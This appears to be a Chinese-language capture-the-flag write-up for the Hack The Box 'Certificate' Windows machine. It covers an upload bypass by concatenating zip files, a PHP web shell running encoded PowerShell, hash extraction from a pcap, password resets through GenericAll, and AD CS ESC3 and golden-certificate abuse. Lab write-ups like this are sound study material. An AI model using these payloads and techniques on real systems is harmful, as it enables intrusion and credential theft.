HTB_certificate
Windows(Hard)
总结
user->root
文件上传+zip绕过->php反弹xamppuser-shell->数据库读取->sara.b->pcap,hash提取破解(或者GeneracAll去强制修改密码)->lion.sk->ESC3->ryan.k->gold-cert
W1.当拿到powershell,使用mysql.exe时出现不回显问题,或者报错问题(access denied)
& cmd /c "mysql.exe -u certificate_webapp_user -p'xxx' -e ""select 1;""" 2>&1Q1:补全路径即可,比如
C:xamppmysqlbinmysql.exe -u certificate_webapp_user -p"xxxx" -e "select 1;"2.在pcap中,如果过滤的smb2是以NTLMv2形式呢,hash构成由5部分
username::domian:server_challenge:ntlmssp.ntlmv2_response.ntproofstr:ntlmssp.ntlmv2_response(去掉前面重合的ntproofstr部分)
那如果是krb形式,etype 18,Pre-Auth,-m 19900
$krb5pa$18$<user>$<realm>$<cipher>
-
3.
Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)说明 bloodhound中 -d 域 和 用户不匹配 ,sara.b时不要带dc01
4.另外当pcap中破解的密码不管用,从sara.b的bloodhound可知,sara.b对lion.sk有 GenericAll权限,所以可直接改密码 net rcp password(复盘时似乎已禁用)
5.因为bloodhound中最多指向了lion.sk,没有进一步的路线了,lion.sk的组有个和certificate service有关的,就想到ca了 ,但复盘时,其实是因为 DOMAIN CRA MANAGERS 这个组,指证书请求代理
6.压缩包的妙用?
对于7zip压缩包呢,通过合并2个zip,这样只会显示第一个zip的文件内容,而隐藏了第二个zip的文件内容从而实现绕过
根据**@macavitysworld**师傅分享,修改了下
zip 1.zip 1.pdf
mkdir files;cd files
vim shell.php
<?php system('powershell -e JABjAGwAa..');?>
zip -r 2.zip ../files/
cat 1.zip 2.zip > 3.zip7.-template 'SignedUser' 而不是wiki里的'User'?
'User'属于内置证书,SignedUser?
不清楚
8.Golden Cert?
受害者有企业CA证书的私钥,可伪造用户证书
https://bloodhound.specterops.io/resources/edges/golden-cert
参考
wp
https://4xura.com/ctf/htb-writeup-certificate/
其它
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
https://bloodhound.specterops.io/resources/edges/golden-cert
原文始发于微信公众号(羽泪云小栈):HTB_certificate
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论